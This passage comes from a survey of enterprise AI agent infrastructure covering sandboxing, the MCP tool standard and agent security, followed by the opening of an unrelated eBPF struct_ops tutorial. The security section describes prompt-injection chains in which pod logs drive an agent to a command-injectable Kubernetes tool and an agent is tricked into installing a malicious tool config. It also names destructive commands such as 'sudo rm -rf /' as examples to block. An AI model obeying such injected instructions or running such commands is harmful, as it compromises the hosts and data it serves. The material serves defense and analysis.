Local Sandboxing Solutions. Not all organizations use Kubernetes or need cloud-scale multi-tenancy; for individual developers or on-prem deployment, there are lighter-weight sandbox solutions emerging. One notable project is ERA (by BinSquare), which provides a local sandbox for running AI-generated code with "microVM security guarantees plus containers ease of use". ERA uses technologies like krunvm (firecracker microVM runner) under the hood, orchestrated in a way that feels like using Docker containers. The idea is to give developers a quick way to test AI-written scripts safely on their laptop or CI pipeline, without having to set up full Kubernetes. Similarly, some frameworks allow using WebAssembly (Wasm) sandboxes for certain tasks (since Wasm can restrict file and network access for code running within it). The InfoQ article on sandboxing mentions Lightning AI's LitSandbox and a library called container-use as alternatives, which likely explore isolating Python execution or providing wrapper APIs that simulate a sandbox. While these are not yet as standardized as the Kubernetes Agent Sandbox, they indicate a broad interest in making sandboxing accessible across environments.

Integration with Agent Frameworks. Modern agent frameworks are starting to build in assumptions about sandboxing. For example, LangChain (one of the earliest agent libraries) historically would just execute Python code or bash commands directly on the host, which is obviously dangerous in production. By late 2025, we see frameworks like LangGraph 1.0 (the evolution of LangChain's agent module) emphasizing "durable and safe" execution, and CrewAI (another open-source agent framework) adding features for asynchronous tool execution and monitoring to potentially plug into sandboxed runtimes. Microsoft's Agent Framework integrates with their Azure Foundry services, which likely means an agent's code execution can be routed to a managed sandbox (e.g. an isolated Azure Function or container instance) – in their blog they highlight "enterprise-grade deployment from the beginning", including security and compliance hooks. We also see new tools like Aspire's AI agent isolation module (by Microsoft) which aims to allow developers to run multiple agent instances in parallel without conflict, hinting at port isolation and MCP proxy layers. All these efforts point to execution isolation becoming a default part of agent system design. It's no longer assumed that an agent's code runs in the same process as the host application or with full OS privileges – instead, agents run in a contained, observable slot, much like how web browsers run untrusted JavaScript in a sandboxed process.

Transactional and Fault-Tolerant Execution. A sophisticated angle to sandboxing is making execution fault-tolerant. If an agent's action fails or does something unwanted, can we roll it back? One recent research prototype, Fault-Tolerant Sandboxing for AI Coding Agents, introduced a transactional file system wrapper for agent execution. It intercepts file system writes and system changes during an agent's tool use, and if the agent misbehaves or a policy violation is detected, the sandbox can rollback to a clean snapshot. In their experiments, 100% of unsafe actions were intercepted and rolled back, at a cost of ~14.5% performance overhead. However, they note a key limitation: this works for local state (files, processes) but not for external side-effects. If the agent made a cloud API call that created resources or sent emails, a local rollback doesn't undo those. This is pushing the conversation toward distributed transaction semantics for agents – treating a sequence of tool API calls as a saga that might need compensating actions if aborted. While not solved yet, it's a recognized gap (researchers call for integrating compensating transactions for external tools to truly sandbox at the multi-system level). For now, sandboxing primarily ensures the agent's local environment can be reset to a safe state even if one step goes awry.

Human Takeover and Hybrid Sandboxes. An intriguing development in sandbox design is support for human-in-the-loop interventions not just via yes/no approval prompts, but via full manual control of the sandbox. The idea is that if an agent reaches a step where it is stuck or needs privileged action (like entering a password or solving a tricky problem), a human operator can seamlessly take over the agent's sandbox session, do what's needed, and then hand control back to the AI. The research prototype AgentBay embodies this concept: it provides a unified isolated session that the AI agent can control via API (e.g. issuing OS commands, browser actions) and that a human can remote into graphically at any moment. AgentBay implements a custom Adaptive Streaming Protocol (ASP) to make this possible with very low latency. Unlike traditional screen sharing (RDP/VNC), ASP dynamically switches between sending high-level commands and video frames, adjusting to network conditions and whether the AI or human is currently in charge. The result is a much smoother experience for the human supervisor, even on weaker networks. In tests, allowing a human to intervene in AgentBay's sandbox improved task success rates by over 48% on complex benchmarks, showing the value of fluid HITL (Human-In-The-Loop) control. This approach directly addresses enterprise needs for control: rather than the agent being a black-box automation that might get stuck, it becomes a cooperative automation that an analyst or engineer can jump into whenever needed, without compromising the isolation or requiring the task to be restarted. We foresee future enterprise agent platforms offering a "panic button" or agent assist mode that spawns a secure VNC/Browser session for an operator, all actions logged, then closes back to autonomous mode.

In summary, sandboxing in agent systems has evolved into a multi-faceted capability: it's not only about securing the environment (with VMs, syscall filters, network restrictions), but also about managing the agent's lifecycle and state (persistent storage, snapshots, warm pools) and facilitating controlled handoffs (pause/resume and human takeover). The investments by major players – e.g. Google building Agent Sandbox as a CNCF project – indicate that these sandboxing techniques will likely become standard infrastructure in cloud platforms. Just as Kubernetes gave us primitives for scalable microservices, we are now getting primitives for safe autonomous agent execution on the cloud and the edge.

3. Tool Ecosystem and Standardization: From Plugins to MCP

In parallel with sandboxing the runtime, the industry has tackled the tool integration problem for agents. Early agent implementations often hard-coded a set of tools or required developers to write custom "plugin" adapters for each use case. This doesn't scale when enterprises might want agents to access dozens of internal APIs, databases, and third-party services. The last six months have seen a strong push toward standardizing how agents discover and use tools, yielding a more interoperable ecosystem.

3.1 Model Context Protocol (MCP) and the AAIF

Model Context Protocol (MCP) has emerged as the de facto standard protocol in this space. As mentioned, MCP defines a client-server schema where the AI agent (client) can list what tools a server offers, call those tools with JSON arguments, and receive results. It also covers things like authentication handshakes (e.g. OAuth flows to let an agent "login" to use a tool on a user's behalf) and streaming responses (for tools that send incremental results). By late 2025, MCP's momentum was cemented by the formation of the Agentic AI Foundation (AAIF) under the Linux Foundation. In December 2025, the Linux Foundation announced AAIF with MCP as a founding contribution alongside OpenAI's AGENTS.md and Block's Goose. The goal is to provide a neutral, open governance home for these agent standards so that no single company controls them. The AAIF launch PR notes MCP had already exploded in adoption: over 10,000 MCP servers published covering everything from dev tools to Fortune 500 internal integrations, and support built into major AI platforms including Claude, ChatGPT, GitHub Copilot, Google Gemini, VS Code, Cursor, and many others. This is remarkable considering MCP was only open-sourced in late 2024 – it resonated because it addressed an urgent pain point: without it, every AI vendor and every enterprise would be duplicating integrations. By rallying around MCP, the community effectively agreed on a "lingua franca" between agents and tools.

From an enterprise perspective, MCP brings several benefits:

Interoperability: A tool (say a database query interface) can be implemented once as an MCP server and then used by different agents (Anthropic's, OpenAI's, self-hosted ones) without custom adapters. This has analogies to drivers or connectors in classical software – build it once, use anywhere.
Security and Auditability: MCP messages are structured (JSON) and typically go through a client library in the agent runtime, where they can be logged and inspected. This makes it easier to audit what the agent asked a tool to do, as opposed to the agent running free-form shell commands that are hard to intercept. The protocol includes a capability advertisement step (the server tells what it can do), which can be checked against policies. It also often requires an auth handshake (e.g. OAuth) for the agent to gain access to the tool on behalf of a user, which means existing identity systems can mediate access.
Modularity and Future-proofing: As InfoQ summarized, MCP shifts integration from a tangled web into a modular architecture, reducing the "plugin fatigue" problem and making it easier to add new tools or swap out models. It also levels the playing field – small open-source projects can publish MCP servers that become as easily usable as those from big vendors, fostering a community ecosystem of tools.
Neutral Governance: With AAIF, companies like AWS, Google, Microsoft, Anthropic, and OpenAI are all at the same table (indeed all are listed as platinum members). This reduces the risk that MCP splinters into competing versions; it's likely to become analogous to HTML or SQL – a baseline standard that everyone implements, with maybe some extensions.

It's worth noting that MCP is evolving to cover more than just "traditional API calls." Recent extensions include Agent-to-Agent messaging (so an agent can expose itself as a tool to others via MCP) and binary data support (for image and file transfer). The AGENTS.md standard, also under AAIF, complements MCP by providing a way for software projects to declare to agents how to interact with them. AGENTS.md is essentially a README for AI agents, placed in a code repo to describe the project, its build/test tools, key contexts, and constraints. Over 60k open-source repos have adopted AGENTS.md to guide coding agents. By standardizing this, when an agent (like GitHub Copilot or Cursor) is working on a new codebase, it can automatically read AGENTS.md to understand the project's specific commands (e.g. how to run tests) rather than relying on general knowledge. This reduces errors and makes code-writing agents more reliable across different environments.

MCP Tool Ecosystem. Many companies and open-source teams have published MCP servers for their systems. For instance, GitHub released an official GitHub MCP Server that exposes GitHub operations (issues, PRs, repo contents, etc.) via MCP. This allows an agent to perform GitHub actions (like creating an issue or commenting on a PR) in a safe way – the server enforces GitHub's API policies and scopes. Similarly, we have MCP servers for databases (SQL tools), cloud resources (AWS, Azure MCP servers), information lookups (Wikipedia, web search), and even OS-level tasks (there are MCP servers that wrap shell commands or Docker). A typical enterprise might run a suite of internal MCP servers: one for their ticketing system, one for their customer database, one for DevOps (Kubernetes control like the mcp-server-kubernetes we saw). By doing so, they create a catalog of approved tools that their AI agents can use. Some companies are building MCP Gateways or registries to manage this catalog, which we'll discuss in the security section.

Local-First and Offline Agents. While MCP often assumes a client (agent) connecting to a server over HTTP, it's flexible enough to work in "all local" scenarios too (using stdio pipes). The Goose framework (contributed by Block to AAIF) is described as a "local-first AI agent framework". Goose uses MCP for tool extensions – meaning you can run goose agents on your laptop, and they can spin up local MCP servers for local tools (say, accessing a local filesystem or application) without needing cloud connectivity. This is important for cases where data privacy requires everything to remain on-prem or on-device. It also means an enterprise could package up an agent + tool suite to run entirely in an isolated network (e.g. an AI agent that helps with internal network diagnostics, running in a secure enclave with no internet access, but with MCP hooking into internal systems). The push toward standardization via MCP doesn't imply centralization in the cloud – on the contrary, it can democratize who provides tools (open-source implementations, self-hosted services, etc.) as long as they speak the protocol.

Beyond MCP: Other Standards. While MCP is currently the frontrunner, there are other noteworthy efforts. OpenAPI-based tool use: some agent frameworks allow importing any OpenAPI spec and will auto-generate an "agent tool" from it. For example, Microsoft's Agent Framework highlights that any REST API with an OpenAPI definition can be instantly turned into a tool, with the framework handling schema parsing and secure invocation. This is complementary to MCP: one could imagine MCP servers automatically exposing an OpenAPI, or vice versa. Another is the concept of capability description languages – OpenAI's Function Calling spec is one example, where the model is told function signatures and it outputs JSON for calls. Some researchers propose more formal schemas for tool affordances. At the moment, however, MCP seems to be converging those threads: it provides a structured way for an agent to query "what can I do?" and then invoke a function with arguments, which is essentially function calling over a channel. It's likely we'll see alignment or bridging between OpenAPI, JSON-RPC, and whatever else emerges, to avoid fragmenting this again.

In essence, if sandboxing addresses the agent's "body," MCP addresses the agent's "arms and legs". It standardizes how the agent reaches out to interact with the world. This was a necessary step for agents to become truly useful in enterprise settings, because no single vendor can supply every integration. By lowering the integration barrier, companies can leverage a far broader set of tools. However, as we'll discuss next, giving an AI agent access to many tools also broadens the attack surface and governance burden – thus, standardization and security have to go hand in hand.

4. Security, Governance, and Trust in Agent Systems

Deploying autonomous agents in an enterprise inherently raises the question: how do we trust them? Unlike a deterministic script, an AI agent can come up with unexpected actions, and it might be influenced by inputs (or adversaries) in ways we can't fully predict. Over the past months, a significant focus of both practitioners and researchers has been on closing the "trust gap" – ensuring that agents do what they're supposed to and nothing more, or at least that we can detect and mitigate when they misbehave. Several key themes have emerged: permission and policy models, supply chain security of tools, prompt injection defenses, auditing and observability, and fail-safe mechanisms. We'll examine each in turn.

4.1 Prompt Injection and Confused Deputy Problems

Prompt injection – where an external input is crafted to manipulate the agent's LLM into ignoring its instructions or performing unintended actions – has proven to be a very real threat. In the context of agent tools, prompt injection can become a "confused deputy" attack: the LLM is the deputy that has privileges (access to tools) and the attacker exploits it via crafted input (a prompt) to misuse those privileges. A simple example: an attacker might embed a malicious command in a user-provided email, which the agent then dutifully executes with its shell tool. Real incidents and proofs-of-concept have shown this is not just theoretical. The consensus in discussions (e.g. on Hacker News) is that prompt injection is analogous to XSS (cross-site scripting) in web apps – you cannot fully eliminate it just by sanitizing inputs, because the model's behavior with arbitrary text is hard to constrain. Thus, relying solely on prompt-based safeguards (like "don't execute if user says to do something bad") is brittle.

The more robust approach is structural: limit what the agent can do even if it's tricked. This means enforcing policy at the tool invocation layer. For instance, if the agent tries to run a shell command, have a policy that disallows rm -rf or network calls to sensitive endpoints. If it uses a database tool, ensure it cannot query tables it shouldn't. This is where sandboxing and permission models overlap. In a sandbox, you can intercept system calls – e.g. prevent file writes outside a certain directory, or limit network access to only whitelisted domains. With MCP, you can implement an allow-deny policy per tool – e.g. forbid a certain combination of API calls or detect if the arguments look suspicious (like a SQL query that's dumping all user data).

One concrete advancement is the research AgentBound framework, which proposes attaching a declarative access control policy to MCP servers. Inspired by Android's app permissions, AgentBound allows a tool to declare what host resources it needs (files, network targets, etc.), and an admin can approve or limit those. At runtime, an enforcement engine monitors the agent's calls and blocks anything outside the allowed scope. Impressively, AgentBound's evaluation auto-generated policies for 296 popular MCP servers with about 80.9% accuracy from the code, and could block the majority of malicious actions with negligible overhead. This suggests that intelligent tooling can help manage the policy burden: we can analyze a tool's code to infer "this tool should only ever need to access X API or Y file", then use that as a sandbox rule.

Another line of defense is schema validation. Many tools expect inputs of a certain form (JSON with specific fields, numbers in ranges, etc.). If the agent's output deviates, it can indicate either a prompt injection or a model error. Rigorously validating the agent's action format before executing it can catch some attacks or mistakes. In fact, OWASP's recommendation of command validation falls here – e.g. if an agent tries to execute sudo rm -rf /, the sandbox or tool wrapper should detect that and refuse.

It's widely acknowledged that prompt injection cannot be fully solved at the model level, so enterprise systems are layering these runtime controls. Some are even exploring two-model setups: one model generates a plan or interprets user input without any tools (and thus with no privileges), then a separate "execution model" with tools enabled but a much more constrained input (only the sanitized plan). This is analogous to separating policy decision and policy enforcement. However, this approach is in its infancy – researchers have noted it's tricky to ensure the two models stay in sync and that the first model doesn't inadvertently become a covert channel for bad instructions.

4.2 Tool Supply Chain Security

As the MCP tool ecosystem grows, a new class of security concerns appears: the tools themselves may have vulnerabilities or could be malicious. We've effectively extended our "attack surface" to any code that implements a tool API. In July 2025, security researchers disclosed critical flaws in some community-developed MCP servers:

The MCP Server for Kubernetes (an MCP tool that allowed agents to run kubectl commands on a cluster) had a command injection flaw. It constructed shell commands from user input without sanitization, so an attacker could embed | or && to execute arbitrary commands on the host. Not only that, the advisory demonstrated a prompt injection chain: if an agent was asked to read a pod's logs (which contained malicious instructions), the agent might then call a vulnerable kubectl tool with those instructions, leading to RCE (Remote Code Execution) on the MCP server host. This is a vivid example of how an innocuous high-level task (read logs) can cascade into a full compromise via weaknesses in the tool implementation. It underscores that agent security is only as strong as the weakest tool in its arsenal.
Another advisory for mcp-package-docs (a tool for reading package documentation) had a similar shell injection issue. Essentially, many early tools naively used exec() on strings, a practice long known to be dangerous in any software context.
The AI coding assistant Cursor found an even more subtle exploit: an agent could be tricked into writing a malicious MCP server configuration to disk (effectively "installing" a new tool) which would then be loaded and executed, giving the attacker code execution on the system. In response, Cursor had to forbid agents from writing to certain config directories.

These incidents highlight supply chain risk: when you install an MCP server from NPM or pip, do you know it's safe? Could it have a dependency hijacked to steal data? Traditional supply chain best practices – code signing, vetting maintainers, vulnerability scanning – all apply here. But additionally, the dynamic nature of agent tool use requires new thinking. For example, an agent might fetch a tool definition (schema) from somewhere at runtime – that channel could be compromised (a malicious tool listing that lies about what it does). To address this, the community is discussing tool registries with verification. Imagine an "App Store" for MCP tools where each tool is reviewed, sandboxed, and cryptographically signed. The Linux Foundation AAIF might play a role in hosting a global registry, or there may be vendor-specific ones.

Some researchers call for transparency logs and a "SBOM" (Software Bill of Materials) approach for agent tools. For instance, an enterprise might want a log of every tool version the agent ever used, so if one is later found malicious they can audit past agent runs. They also want assurance that the tool code running is exactly the code that was audited. This is akin to how modern browsers handle extensions: with strict signing and review processes.

On the defense side, one idea is dynamic tool vetting – before an agent uses a new tool, run that tool in a test mode on known benign inputs to see if it behaves correctly, or run it in a shadow sandbox with instrumented monitoring to detect unexpected actions. This is analogous to how app stores do a review, but potentially automated and at runtime. For now, this is an open research problem; we haven't seen full implementations yet, but it's identified in literature as a needed control.

In summary, securing the tool ecosystem requires both preventive measures (secure coding practices for tool developers, automated scans for dangerous patterns like execSync on inputs) and mitigations (running tools with least privilege, e.g. a tool that only needs to read a database should not also have OS write access). The principle of least privilege should apply at every level: the agent only has access to certain tools, the tool only has access to certain system resources. Achieving this in practice means plumbing through the user's identity and intent: e.g., if an agent is acting on behalf of Alice, the database tool should run under Alice's credentials or a role with her permissions, not a superuser. This is an area where enterprise IAM (Identity and Access Management) integration is critical – mapping the human user's identity to the agent's allowed actions. Recent work is exploring how to tie enterprise SSO/OAuth tokens into agent sessions in a fine-grained way, so that an agent cannot escalate its privileges beyond what the user would normally have through regular apps.

4.3 Monitoring, Auditing, and Policy Enforcement

Observability is notoriously difficult for AI systems because of their nondeterminism and unstructured outputs. But for agents, observability is non-negotiable in enterprise settings. Operators need to be able to ask: "What sequence of steps did the agent take? Why did it take a certain action? What tool calls were made with what parameters? Did anything unusual happen?" To that end, agent platforms are incorporating extensive logging and tracing capabilities:

Structured Traces: There's a push to use standards like OpenTelemetry to trace agent execution like any microservice call graph. Each agent action (e.g. "called Tool X with params Y, got result Z") can be a span in a trace. This allows using existing APM (Application Performance Monitoring) tools to visualize agent workflows. Some commercial platforms now show a real-time step-by-step trace of the agent's reasoning and tool use (often known as an "Agent console" or debug pane).
Semantic Logging: Beyond raw tool call logs, there's interest in capturing higher-level events. For example, flag if an agent's plan changed drastically mid-execution (could indicate it got confused or was manipulated), or if it requested an unusually large amount of data from a tool. Logging the content of prompts and responses is tricky (for privacy reasons), but logging the intents and outcomes is feasible. Additionally, cryptographic logging (hash chaining the logs) has been suggested so that forensic analysis can trust that logs weren't tampered with.
Auditing for Compliance: In sectors like finance or healthcare, any automated system needs audit trails for compliance. If an agent made a change to a customer's record, we need to know who/what prompted that and that it was authorized. Solutions here include linking agent actions to a user session and storing that context (e.g. "Agent acted on behalf of Alice, in response to request R, at time T"). Some enterprises restrict certain tools to manual-confirmation mode where a human must approve the agent's action in a dashboard (common for things like executing a trade or sending an email). Ensuring the agent properly presents the action for approval (and doesn't hide the true intent) is an active UX/security challenge.
Policy Engines: Enterprises are beginning to employ policy-as-code systems (like Open Policy Agent or custom rule engines) to govern agent behavior. For example, a policy might be: "Agents cannot call the production database tool with a WHERE clause missing a limit, unless the user is in admin role." When an agent attempts such a query, the policy engine can intercept and either block it or route it for approval. This ties into MCP Gateway architectures, where instead of the agent connecting directly to tool servers, it connects to a Gateway proxy that mediates all calls. Microsoft's preview of an MCP Gateway shows features like session persistence (to keep agent-tool sessions sticky) and a central place to enforce auth, rate limiting, etc. We can foresee these gateways becoming very sophisticated, implementing org-wide guardrails (e.g. no agent can call external web APIs that are not in a vetted list, to prevent data exfiltration).
Evaluation and Testing: An emerging practice is to treat agents like code and develop evaluation suites for them. Before deploying an agent update (new model version or new tool), run a battery of scenarios (some normal, some adversarial) to see how it behaves. In late 2025, multiple benchmarks for agent safety were released to facilitate this. The MCP-SafetyBench is one such benchmark: it tests LLM agents on realistic multi-step tasks across five domains (web browsing, financial analysis, code repo management, navigation, and web search) while injecting 20 types of attacks (from prompt tampering to tool output manipulation). The sobering result: no current model is remotely immune to MCP-based attacks – even top-tier models had 30–48% of tasks compromised. They also found a negative correlation between task performance and security: models that are more capable at completing tasks also tend to be more exploitable, presumably because they more eagerly follow any instruction including malicious ones. This points to a fundamental safety-utility trade-off. Enterprises must calibrate how "aggressive" or autonomous they want the agent to be. Some are introducing adjustable risk settings – e.g. a slider from conservative (fewer tools, more confirmations) to aggressive (full autonomy, high risk). A metric called NRP (Normalized Risk-Performance) was proposed to quantify this balance. Ultimately, continuous evaluation will be key: as new attacks are discovered, adding them to test suites and ensuring the agent (with all its tools and policies) can handle or resist them.

4.4 Identity, Authentication, and Governance

A less glamorous but absolutely crucial aspect is identity and access management (IAM) for agents. When an agent performs an action, whose authority is it under? In a multi-user environment (say an AI assistant in a company), the agent might have to act as different users at different times. Traditional OAuth wasn't designed for a scenario where an LLM is effectively a headless client acting interactively on behalf of a user. Over the past months, developers have hit practical snags integrating OAuth with MCP. For example, the OAuth Dynamic Client Registration used by MCP (so an agent can automatically register itself to use an API) sometimes fails with enterprise IdPs due to strict URL checks. Some IdPs don't allow dynamic clients at all. There are calls to allow static client credentials or out-of-band provisioning for agents in such cases. This is more of a standards gap than a research one – it's being worked through in the MCP working group.

From an enterprise architecture view, many want the agent to integrate with existing SSO. That means when an employee invokes an agent, the agent should use that employee's OAuth token to access tools. This ensures all actions are attributable and within the user's permissions. It's straightforward for some tools (like an MCP server can simply require a token from the agent), but complex for others (e.g. a shell tool on a server – how to scope that per user?). Some solutions involve impersonation tokens or scoped API keys: e.g. the agent might have a key that only allows certain operations and is tagged to the user.

The concept of "least privilege" comes into sharp focus here: the agent should only have the minimum access needed for the task, and ideally only for the duration needed. Techniques like OAuth token exchange or short-lived credentials are recommended. If an agent is spun up to do a build job, give it a temporary token that expires after, so even if it went rogue, it couldn't do damage later. One recent architecture paper emphasizes integrating enterprise identity with these agents so that all actions flow through the normal IAM checks and logs of the enterprise. That means, for instance, an agent using a Jira tool would appear in the Jira audit logs as "actions performed via AI agent on behalf of Bob". This transparency is needed for trust – people won't use the agent if it's a black box doing things in the shadows.

Governance also extends to deciding which tasks to automate vs require human approval, what data agents are allowed to see, and how to prevent data leakage. Some enterprises restrict agents from accessing production data entirely, using them only on sanitized or test datasets until trust is built. Others put heavy monitoring on outputs (e.g. scanning everything the agent is about to output to a user for sensitive data). These are areas where data loss prevention (DLP) tools intersect with AI. A future vision is that an enterprise agent platform will integrate DLP classifiers that flag if an agent's response likely contains company confidential info, and either redact it or alert a human.

Finally, we must mention user trust and adoption: beyond technical measures, building trust in agents involves user education and incremental rollout. Many organizations start with "read-only" agents (they can suggest actions but not execute them) and then gradually allow more autonomy as confidence grows. By having robust logs and a clear override path, users are more likely to accept the agent's help. Trust is also enhanced by making the agent's reasoning visible (hence the popularity of chain-of-thought traces displayed to users) and by giving users easy ways to correct or stop the agent. In essence, transparency and control are the antidotes to the unpredictability of AI.

The advancements in the last half-year – from sandbox isolation to protocol standardization and new benchmarks – all aim to shrink the trust gap. Yet, open challenges remain (discussed in the next section) before one can confidently say an autonomous agent is as well-understood and controlled as a traditional software microservice.

5. Open Challenges and Future Directions

Despite rapid progress, enterprise agent systems still have unsolved research questions and practical gaps. We conclude by highlighting some of the most pressing ones, as identified by recent discussions and publications, which represent opportunities for future work:

Unified Cross-Layer Security Model: Today we have pieces – OAuth for identity, MCP scopes for tool access, sandbox for OS isolation – but they don't always speak the same language. There is no single policy that says, for example, "User X's agent can read from database Y but not write, and can run code but only use 2 CPU and no internet, and these conditions are cryptographically verified." A comprehensive model that ties user identity, agent capabilities, tool permissions, and sandbox OS permissions into one coherent framework is needed. Early proposals like AgentBound (inspired by mobile app permissions) are a start. In the future, we might see capability tokens that encode all these at once – the agent carries a token which the sandbox and tools all check, limiting what it can do in each context. Formal verification of such models (to prove an agent cannot do X) would greatly enhance trust.
Rollback of External Side Effects: As noted, while we can rollback filesystem changes in a sandbox, we cannot yet rollback an email sent or a transaction made. Developing agent transaction protocols or sagas is an open challenge. One idea is to require critical tools to provide a compensation function – e.g. an MCP server for cloud VMs could have an "undo" for creating a VM (which would delete it). An agent planner could then use these to revert a series of actions if needed. This also ties into training the LLM or using a secondary verifier to decide when to rollback (e.g. if it notices an outcome diverges from expected state). Without solving this, enterprises will be hesitant to let agents perform irreversible operations autonomously.
Advanced Threat Defenses: The taxonomy of potential attacks (context injection, tool poisoning, cross-tool data leaks, etc.) is growing. Defenses like context signing (cryptographically signing tool outputs or important prompts to prevent tampering) have been suggested but not widely implemented. The idea there is: an agent would only trust tool outputs that come with a signature or hash, so an attacker who intercepts or modifies the content (like a man-in-the-middle on an HTTP tool) would fail. Similarly, isolating tools from each other (so one tool can't directly influence another except through the agent's vetted reasoning) is a challenge – currently the agent's memory is the meeting point of all tool data, making it a melting pot where a malicious output in one tool can affect decisions involving another.
Benchmarking and Standards for Evaluation: The community has started benchmarks like MCP-SafetyBench and MSB, but we need continuous evaluation pipelines. Perhaps an open leaderboard where agent developers can submit their agent (with a certain set of tools and policies) to be evaluated against a suite of scenarios, similar to how language models are benchmarked on GLUE or SuperGLUE for NLP. This could drive competition and improvement in safety. Also, evaluation should include cost and latency metrics – an agent that is safe but takes hours or $$$ to complete a task isn't practical. Balancing efficiency with safety will likely lead to innovations like adaptive risk modes (the agent switches to a more cautious approach if it senses something sensitive, trading speed for safety dynamically).
Human-Agent Interaction Paradigms: AgentBay's approach to HITL is one example of making agents more usable in the real world. There is still work to do on when and how an agent should ask for help. If it asks too often, it's not useful; if it asks too rarely, it might make an irrecoverable error. Finding that sweet spot (perhaps through reinforcement learning or feedback from users) is an ongoing area. Also, UI/UX research into how to present agent decisions to users in a clear way will be important (so users can confidently approve or deny actions). In enterprises, this might mean integrating agent controls into existing interfaces – e.g. showing an "AI agent suggestion" in a Jira ticket with a one-click approve.
Cross-Organization Collaboration and Data Sharing: Enterprise agents often need to work across silos – e.g. an agent might coordinate between a supplier's system and the company's internal system. This raises questions of federated trust: how do you let an agent use two domains' tools in a secure way? This touches on things like standardizing how agents convey identity across org boundaries, and how audit logs are shared. The AAIF being under Linux Foundation hints at future inter-company standards to address this, since agents won't stop at the corporate firewall.
Ethical and Compliance Considerations: Beyond security, enterprises must ensure agents comply with regulations and ethical norms. For example, if an agent interacts with personal data, privacy laws apply. How do we audit that an agent didn't retain or leak personal data beyond allowed purposes? Techniques like data tagging and tracking could be employed – marking certain outputs as containing sensitive info and preventing them from being used in contexts that aren't allowed. Ensuring AI explanations for decisions (especially if used in regulated domains) is another angle – if an agent makes a decision that affects a customer, one might need a rationale logged for compliance, which is tricky given the opaque reasoning of LLMs.
Improving Model Robustness: Finally, at the heart is the LLM itself. There's ongoing research into fine-tuning models to be more resistant to manipulation (advantageous to safety but often at odds with capability). Techniques like constitutional AI or adversarial training on tool-use scenarios might yield models that inherently refuse certain dangerous actions or at least flag uncertainty. Also, specialized models for parsing and validating the agent's outputs (e.g. a secondary model that checks if a proposed action seems safe/rational) could be integrated. OpenAI and others are exploring "moderator" models that look at the main model's outputs. In agents, a "policy model" might examine the plan and tool uses and raise red flags for anything that violates training-time learned safe patterns.

Outlook: The next year will likely bring a maturation of the agent ecosystem akin to what 2010-2015 saw for cloud microservices – an explosion of tools and best practices to handle deployment, security, monitoring, and standardization. The formation of AAIF is a strong indicator that industry players see collaboration as the way forward; no one wants a fragmented, Wild West environment when so much is at stake (both in terms of safety and potential business value). We will probably see AgentOps teams emerge in organizations, analogous to MLOps, focused on managing and supervising fleets of agents. They'll use dashboards (like GitHub's Agent HQ mission control) to oversee agent activities across the enterprise. And just as DevOps developed guardrails and CI/CD for code, AgentOps will develop guardrails and continuous evaluation for autonomous AI behaviors.

In conclusion, enterprise agent systems are transitioning from the lab to the real world, carrying with them both excitement (unprecedented automation capabilities) and caution (novel failure modes). Sandbox architectures and protocols like MCP have laid a foundation that makes these systems more modular, controllable, and interoperable than before. Yet, achieving a level of trust comparable to traditional software will require continued innovation in permission modeling, verification, and human oversight integration. The last half-year's progress has been remarkable – what was mostly sci-fi a year ago (multiple AIs collaborating on complex tasks with minimal human input) is now demonstrably feasible. The coming months will likely see pilots turn into production deployments in enterprises, each teaching new lessons. By actively sharing these lessons and converging on open standards and benchmarks, the community can accelerate the safe adoption of agentic AI. The end goal is an ecosystem where AI agents become reliable teammates – tirelessly automating drudgery and navigating complexity – while humans retain ultimate control and understanding of their behavior. The path to get there is challenging, but as this survey shows, the groundwork is rapidly being put in place.

References

Open-Source Agent Sandbox Enables Secure Deployment of AI Agents on Kubernetes - InfoQ News on Agent Sandbox, gVisor/Kata isolation, CRD for stateful agents, OWASP Top 10 for AI Agents
Google launches Agent Sandbox for secure AI agents on Kubernetes - TechInformed on gVisor isolation, pre-warmed pools (90% faster startups), Pod Snapshots
Linux Foundation Announces Formation of Agentic AI Foundation (AAIF) - MCP, Goose, AGENTS.md contributions; cross-industry support
MCP: The Universal Connector for Building Smarter, Modular AI Agents - InfoQ on MCP benefits (M×N to M+N integration, interoperability)
Introducing Microsoft Agent Framework - Microsoft Foundry Blog on open standards (MCP, A2A, OpenAPI) and enterprise readiness
What's new in Microsoft Foundry (Oct/Nov 2025) - Microsoft Agent Framework updates
GitHub launches Agent HQ for AI-powered coding - InfoWorld on managing multiple coding agents with governance, audit, and mission control
CVE-2025-53355: mcp-server-kubernetes command injection vulnerability - GitHub Advisory on unsanitized execSync and prompt-injection exploit via pod logs
Securing AI Agent Execution (arXiv:2510.21236) - Bühler et al. 2025: AgentBound permission framework for MCP tools, auto-policy generation (~80% accuracy)
AgentBay: A Hybrid Interaction Sandbox (arXiv:2512.04367) - Piao et al. 2025: unified sandbox with AI API control + live human takeover (48% higher task success with HITL)
MCP-SafetyBench (OpenReview) - Lan et al. 2025: real MCP server benchmark, 30–48% attack success on tested LLMs
MCP Attacks: Threats, Taxonomy, and Defenses - Adnan Masood on threat taxonomy for tool-using LLMs

eBPF Tutorial: Extending Kernel Subsystems with BPF struct_ops

云微 — Tue, 27 Jan 2026 07:20:44 +0000

Have you ever wanted to extend kernel behavior—like adding a custom scheduler, network protocol, or security policy—but were put off by the complexity of writing and maintaining a full kernel module? What if you could define the logic directly in eBPF, with dynamic updates, safe execution, and programmable control, all without recompiling the kernel or risking system stability?

This is the power of BPF struct_ops. This advanced eBPF feature allows BPF programs to implement the callbacks of a kernel operations structure, effectively letting you "plug in" custom logic to extend kernel subsystems. It goes beyond simple tracing or filtering—you can now implement core kernel operations in BPF. For example, we use it to implement GPU scheduling and memory offloading extensions in GPU drivers (see LPC 2024 talk and gpu_ext project).

In this tutorial, we will explore how to use struct_ops to dynamically extend kernel subsystem behavior. We won't be using the common TCP congestion control example. Instead, we'll take a more fundamental approach that mirrors the extensibility seen with kfuncs. We will create a custom kernel module that defines a new, simple subsystem with a set of operations. This module will act as a placeholder, creating new attachment points for our BPF programs. Then, we will write a BPF program to implement the logic for these operations. This demonstrates a powerful pattern: using a minimal kernel module to expose a struct_ops interface, and then using BPF to provide the full, complex implementation.

The complete source code for this tutorial can be found here: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops

Introduction to BPF struct_ops: Programmable Kernel Subsystems

The Challenge: Extending Kernel Behavior Safely and Dynamically

Traditionally, adding new functionality to the Linux kernel, such as a new file system, a network protocol, or a scheduler algorithm, requires writing a kernel module. While powerful, kernel modules come with significant challenges:

Complexity: Kernel development has a steep learning curve and requires a deep understanding of kernel internals.
Safety: A bug in a kernel module can easily crash the entire system. There are no sandboxing guarantees.
Maintenance: Kernel modules must be maintained and recompiled for different kernel versions, creating a tight coupling with the kernel's internal APIs.
